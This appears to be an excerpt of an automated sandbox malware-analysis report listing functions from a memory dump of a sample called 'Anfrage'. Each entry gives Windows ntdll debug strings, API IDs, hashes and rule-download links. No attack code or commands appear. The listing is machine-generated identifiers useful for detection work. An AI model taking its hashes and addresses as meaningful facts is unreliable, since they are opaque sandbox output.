                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-3224558752
                                                                          • Opcode ID: da4468cbe5269d81b37bcba24126961094d0132e043f46b4aee1189a06a5053d
                                                                          • Instruction ID: 5a02117e65200aa836c23fd3b7564d981f02f23f427e65ba6cc8f0207ebb358b
                                                                          • Opcode Fuzzy Hash: da4468cbe5269d81b37bcba24126961094d0132e043f46b4aee1189a06a5053d
                                                                          • Instruction Fuzzy Hash: 5A414376E10765DFE702CF24C8C4BAAB7F4EF00364F608169D44157790DB78A882CBA2
                                                                          Function 3646F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3646F263
                                                                          • HEAP: , xrefs: 3646F15D
                                                                          • Entry Heap Size , xrefs: 3646F26D
                                                                          • ---------------------------------------, xrefs: 3646F279
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                          • API String ID: 3446177414-1102453626
                                                                          • Opcode ID: 67c2fb8cabbefed885a328f898084b216a276718f7de971f12d19245a43d3e96
                                                                          • Instruction ID: 47d9d0540e90bb8a598cc4b7acc15a0357edb9949a748bfb30b6f484fa1e7b3a
                                                                          • Opcode Fuzzy Hash: 67c2fb8cabbefed885a328f898084b216a276718f7de971f12d19245a43d3e96
                                                                          • Instruction Fuzzy Hash: 0E41BD79E00211CFDB01CF16D880985BBFBEF4A3887258569D588AB314DB31ED42CFA0
                                                                          Function 363EDBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-1222099010
                                                                          • Opcode ID: 047f3d0cb7ba8d5df2c8ea5cd137ba5b31f7c349b710bcbadfcd72eb4cbecb6f
                                                                          • Instruction ID: 97b6249b232af754a09842860cf1bc6f9b92159512f67f8964860771bde55337
                                                                          • Opcode Fuzzy Hash: 047f3d0cb7ba8d5df2c8ea5cd137ba5b31f7c349b710bcbadfcd72eb4cbecb6f
                                                                          • Instruction Fuzzy Hash: 0D31D136D54794DFF752EF24C848BAA7BF8EF01754F104095E44257A91CBB8A881CA62
                                                                          Function 36496940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                          • Instruction ID: d9fc1bd2cb87e582e081405bb39d425648572dee49af75f7a762a6cb7808dee5
                                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                          • Instruction Fuzzy Hash: 120237B4948341AFE305CF19C994AABBBE5FFC8714F50892DF9894B264DB31E905CB42
                                                                          Function 3640B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: aa7dbe15aa8c3f99e9617d68374ef79945da7865ea573a44b045380a36002ba3
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: 2181F378E113398EEB06DE65C8507EEFBB1AF85358F54453AD860A7390CB368841CF59
                                                                          Function 363C9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          • Opcode ID: cd1ebeda87cc7b7ef41dcbb9f6bcb2dcaf769bea0fcd3a3dc74bb7da752c255e
                                                                          • Instruction ID: 35c443d446f763f393384e6da856c459a67876997b1c539ab84f388c79eaf02b
                                                                          • Opcode Fuzzy Hash: cd1ebeda87cc7b7ef41dcbb9f6bcb2dcaf769bea0fcd3a3dc74bb7da752c255e
                                                                          • Instruction Fuzzy Hash: A78129B6D002699FDB22CF54CC45BDAB7B8AF08750F1141EAE909B7280D7709E85CFA5
                                                                          Function 363F4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • LdrpFindDllActivationContext, xrefs: 36433636, 36433662
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3643362F
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 36433640, 3643366C
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 3643365C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-3779518884
                                                                          • Opcode ID: 8badc6f2c1275b903254922a684064268bd3f6b4ba2d6677660f5014adb8f50d
                                                                          • Instruction ID: ef577392996e8b289261f8516b39fda4e09f62b695eec5f5633c82f7010584d9
                                                                          • Opcode Fuzzy Hash: 8badc6f2c1275b903254922a684064268bd3f6b4ba2d6677660f5014adb8f50d
                                                                          • Instruction Fuzzy Hash: 94316B66D683519FFB12EE05C884B1573A4AF01394F564066F9046F363EBA2DC88C7F5
                                                                          Function 363E245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3642A992
                                                                          • LdrpDynamicShimModule, xrefs: 3642A998
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3642A9A2
                                                                          • TG96, xrefs: 363E2462
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG96$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1906353270
                                                                          • Opcode ID: b373d110443cd8825dc24427268bdf2954c37af74a8bf86512dc7d2c39070acc
                                                                          • Instruction ID: f14f6cf7dc53fdebd761ff7fd62e73742a41097a984b56c62209873eaa4d1073
                                                                          • Opcode Fuzzy Hash: b373d110443cd8825dc24427268bdf2954c37af74a8bf86512dc7d2c39070acc
                                                                          • Instruction Fuzzy Hash: 84312776E00311EFEB11DF5AC880A5A7BB6FF85744F35045AED40B7240DAB19992CB90
                                                                          Function 364720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: e115d83775580fa410295e017bc06359a7b7f7acd377d67454dd8168818024d3
                                                                          • Instruction ID: 829baa93e742cc5ba3edfe8fe10c787645bd928179466dba7d1ce99e807a5f69
                                                                          • Opcode Fuzzy Hash: e115d83775580fa410295e017bc06359a7b7f7acd377d67454dd8168818024d3
                                                                          • Instruction Fuzzy Hash: D42153B6E00169ABDB11DF69DC40AEFBBF8EF54744F44012AE955E3200EB31D901CBA5
                                                                          Function 363BF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3610490719
                                                                          • Opcode ID: ccfde38502b638967d7dfdb602862106bd794ffe6b7d1ce21984de1f9bed0da0
                                                                          • Instruction ID: 679c35e4c3fed89402da9b10436c4256528dbad92aed094058ade3097fd5059e
                                                                          • Opcode Fuzzy Hash: ccfde38502b638967d7dfdb602862106bd794ffe6b7d1ce21984de1f9bed0da0
                                                                          • Instruction Fuzzy Hash: 23911E79B14751DBFB0ADF65C880B2AB7A9BF80B44F00142DE9419BA81DB34E845CF92
                                                                          Function 363E0BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 3642A10F
                                                                          • LdrpCheckModule, xrefs: 3642A117
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3642A121
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-161242083
                                                                          • Opcode ID: 7e032cd9b3ac94675a13e53bf192670d5e3e46163323619d1fca78fffc29109a
                                                                          • Instruction ID: 047ddb75121c51d5d7f977410b64c3ddaaa0c305777c2729f38889cf66043c2f
                                                                          • Opcode Fuzzy Hash: 7e032cd9b3ac94675a13e53bf192670d5e3e46163323619d1fca78fffc29109a
                                                                          • Instruction Fuzzy Hash: B971DE76E00215DFEB05DFA8C980AAEB7F5EF44704F24446DD941AB200E774AD96CBA1
                                                                          Function 36498927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $File
                                                                          • API String ID: 3446177414-2412145507
                                                                          • Opcode ID: 2ad283ec87a95a1ba9db717d27bb0ae3268c385c8f063665802c83aaf98d1df3
                                                                          • Instruction ID: 3ac184f583ae649c3f66ddd5c2228eb5706cc3b80c55181e977f6365f4cace48
                                                                          • Opcode Fuzzy Hash: 2ad283ec87a95a1ba9db717d27bb0ae3268c385c8f063665802c83aaf98d1df3
                                                                          • Instruction Fuzzy Hash: B6617D71E5022C9FDB268F69CC45BEABBF9AB08700F4445A9E509E71C1DA709F84CF54
                                                                          Function 363FC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 364382E8
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 364382DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 364382D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1783798831
                                                                          • Opcode ID: 396b548cd050d3c75e2a5532469baeb5c64ccb2fe0cdc603bd788a63285dab69
                                                                          • Instruction ID: 51ab0c770f642767c7af14e34ddb0bf14b7a703458d64832ac094103c93255ac
                                                                          • Opcode Fuzzy Hash: 396b548cd050d3c75e2a5532469baeb5c64ccb2fe0cdc603bd788a63285dab69
                                                                          • Instruction Fuzzy Hash: B04102B6D55310AFDB11DF64CC80B4BB7E9EF4A750F10492AFA84A7290EB31D815CB92
                                                                          Function 363FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 36437BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36437B7F
                                                                          • RTL: Resource at %p, xrefs: 36437B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 966e3a12b2ef4a09296ae167b020ec62e06494061cbaa7f310ad60dda49a148b
                                                                          • Instruction ID: 1ac5fd3552f763da04f51cd2edf835f7d7f62c5b606dfb5c8442d14f445d6e3e
                                                                          • Opcode Fuzzy Hash: 966e3a12b2ef4a09296ae167b020ec62e06494061cbaa7f310ad60dda49a148b
                                                                          • Instruction Fuzzy Hash: 9B410379B117028FE711CE25DD40B5AB7F5EF88314F100A2DE9969B680DB32E405CF91
                                                                          Function 363FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3643728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 364372C1
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36437294
                                                                          • RTL: Resource at %p, xrefs: 364372A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 6864d3bd2776cee429bf90905446ad0eb435ce9ccb227217bb2a171450919fca
                                                                          • Instruction ID: ba14b2b41ef6de2f7f0144e6edbd3752970967ff07a4bd4243bc720d2c0da0ce
                                                                          • Opcode Fuzzy Hash: 6864d3bd2776cee429bf90905446ad0eb435ce9ccb227217bb2a171450919fca
                                                                          • Instruction Fuzzy Hash: 45412F75E01312ABE711CE21CE41FA6B7A5FB88350F200619F895AB280DB32E816CFD5
                                                                          Function 36444755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36444899
                                                                          • LdrpCheckRedirection, xrefs: 3644488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36444888
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 3446177414-3154609507
                                                                          • Opcode ID: d8261027a5990d394c0eff5f2babc1090c0acd3bffc0747e4e2ab07b723cae6b
                                                                          • Instruction ID: 35a7670bb5614527c2a5237dda6f35b4286d580987b67e17400df209ff5ecabc
                                                                          • Opcode Fuzzy Hash: d8261027a5990d394c0eff5f2babc1090c0acd3bffc0747e4e2ab07b723cae6b
                                                                          • Instruction Fuzzy Hash: 9D41DE7AE047608BFB13EE29E842A567BE5EF49790F110559ED88A7351E730D802CBE1
                                                                          Function 36472300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 81ceea2f3204762ccdf9f2de5129b9661ca75ea1aaf3eda1954b37893d0345fd
                                                                          • Instruction ID: ec77dc9f211a7ae43c4d61d97feb1a56a0d3bd97f9835f9a39cb02622271161e
                                                                          • Opcode Fuzzy Hash: 81ceea2f3204762ccdf9f2de5129b9661ca75ea1aaf3eda1954b37893d0345fd
                                                                          • Instruction Fuzzy Hash: DF314176E002299FDB51CF39DC40BEFB7B8EF44650F90455AE859E3640EB30AA458FA1
                                                                          Function 36445F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Wow64 Emulation Layer
                                                                          • API String ID: 3446177414-921169906
                                                                          • Opcode ID: 4c5e9aaec3143699d45a7a31b67fe7822da46d600cea0218d823110a7ceb7392
                                                                          • Instruction ID: 2ac94484a0542552e4ea1285f91d47e3f1cf814fe8d11f676b08ae34babf9c39
                                                                          • Opcode Fuzzy Hash: 4c5e9aaec3143699d45a7a31b67fe7822da46d600cea0218d823110a7ceb7392
                                                                          • Instruction Fuzzy Hash: 7D21C77690015DBFAF029EA1CD84DEF7F7EEF46298B4404A4FA15A2140DB34DE05EB61
                                                                          Function 36497CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 1f524f6504744883394411dcf788f4ff9533fe3a275f0e0fd26253216489a133
                                                                          • Instruction ID: f74b9415a10395f35cd0a6b91624b43cfb6b19e0a012ec67d67cafb6308bc5a6
                                                                          • Opcode Fuzzy Hash: 1f524f6504744883394411dcf788f4ff9533fe3a275f0e0fd26253216489a133
                                                                          • Instruction Fuzzy Hash: D7E15C71E40309AFEF05CFA5C885BEEBBF9BF49354F20852AE515AB280D7709A45CB50
                                                                          Function 363EEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3d43d37b355411d8dd8b650e0ff15f0fc9dc90a55824f20709df2992594deb9
                                                                          • Instruction ID: b0c7915d0d95108892e3d56c7bc67507a0d835fd1f38e6812f7962ebb2f42d29
